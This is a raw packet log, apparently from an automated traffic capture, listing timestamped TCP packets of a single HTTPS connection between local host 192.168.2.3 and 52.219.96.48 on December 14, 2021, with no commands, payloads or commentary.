                                                                                              Dec 14, 2021 00:57:17.718121052 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.718221903 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.718441010 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.718487978 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.718528032 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.718558073 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.718578100 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.718641996 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.718652964 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.718703985 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.718791962 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.718832970 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.718883038 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.718898058 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.718911886 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.718956947 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.718969107 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719026089 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.719213009 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719252110 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719301939 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.719319105 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719333887 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.719379902 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.719389915 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719444036 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.719583035 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719625950 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719672918 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.719686031 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719713926 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.719847918 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.719857931 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.719911098 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.720025063 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.720065117 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.720109940 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.720122099 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.720139027 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.720184088 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.720195055 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.720249891 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.720437050 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.720490932 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.720581055 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.720593929 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.720671892 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.720681906 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.720742941 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.723723888 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.723762035 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.723818064 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.723831892 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.723850012 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.723918915 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.723931074 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.723989010 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869005919 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869055986 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869190931 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869323969 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869388103 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869420052 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869445086 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869501114 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869514942 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869591951 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869596958 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869620085 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869645119 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869683027 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869745016 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869755983 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869812965 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869823933 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869878054 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.869957924 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.869997978 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870038033 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870052099 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870069981 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870102882 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870112896 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870167017 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870352983 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870395899 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870444059 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870455980 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870492935 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870505095 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870513916 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870569944 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870713949 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870752096 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870805979 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870816946 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870843887 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870873928 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.870882988 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.870939016 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.871138096 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.871177912 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.871225119 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.871237993 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.871258974 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.871292114 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.871303082 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.871356964 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.913737059 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.913788080 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.913871050 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.914027929 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.914063931 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.914089918 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.914134026 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.019630909 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.019684076 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.019815922 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.019877911 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.019912004 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.019931078 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.019967079 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.019993067 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.019998074 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020003080 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020028114 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020034075 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020087004 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020132065 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020190001 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020339966 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020378113 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020421028 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020441055 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020456076 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020492077 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020503044 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020551920 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020704031 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020740032 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020790100 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020801067 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020817041 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020853996 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.020864010 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.020915985 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021167040 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021205902 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021248102 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021259069 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021275997 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021311045 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021327019 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021380901 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021542072 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021579027 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021616936 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021629095 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021644115 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021675110 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021682978 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021733046 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.021941900 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.021980047 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.022015095 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.022027016 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.022042990 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.022077084 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.022088051 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.022139072 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.062021971 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.062074900 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.062283993 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.062325954 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.062391043 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.062401056 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.063993931 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.064097881 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.170506001 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.170557976 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.170703888 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.170814991 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.170847893 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.170865059 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.170872927 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.170912981 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.170942068 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.170962095 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.170975924 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.170981884 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.171036005 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.171053886 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.171118021 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.171191931 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.171230078 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.171279907 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.171294928 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.171312094 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.171575069 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.171643019 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.171653986 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.171670914 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.171714067 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.171741962 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.171751976 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172014952 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172053099 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172097921 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172111034 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172127008 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172163010 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172173023 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172224998 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172400951 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172441006 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172477961 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172488928 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172504902 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172528982 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172545910 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172804117 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172878027 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172897100 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172910929 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.172967911 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172988892 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.172996044 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.173408031 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.254714966 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.254765034 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.254857063 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.254916906 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.254957914 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.254977942 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.255022049 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.321512938 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.321563959 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.321715117 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.321810007 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.321820974 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.321856022 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.321876049 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.321882963 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.321887970 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.321938992 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.321950912 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.321964979 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.322182894 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.322246075 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.322264910 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.322283030 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.322299004 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.322345018 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.322359085 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.322592020 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.322632074 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.322662115 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.322674036 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.322690010 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.322705030 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.322720051 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.322741032 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.322972059 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323009014 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323045969 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323059082 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323084116 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323102951 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323112011 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323160887 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323385954 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323425055 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323460102 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323472977 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323487043 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323791027 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323854923 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323863029 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323880911 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.323923111 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323941946 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.323950052 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.325419903 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.403781891 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.403829098 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.403911114 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.403930902 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.403960943 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.403980017 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.403987885 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.404019117 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.472321033 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.472373009 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.472455025 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.472491980 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.472515106 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.472579002 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.472592115 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.472635984 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.472671032 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.472711086 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.472724915 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.472748041 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473012924 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473073959 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473102093 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473119020 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473144054 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473164082 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473175049 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473227978 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473438978 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473478079 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473531961 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473542929 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473560095 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473594904 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473604918 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473859072 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473895073 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473944902 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.473958015 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.473973036 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.474006891 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.474018097 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.474069118 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:18.474281073 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.474320889 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:18.474361897 CET49752443192.168.2.352.219.96.48
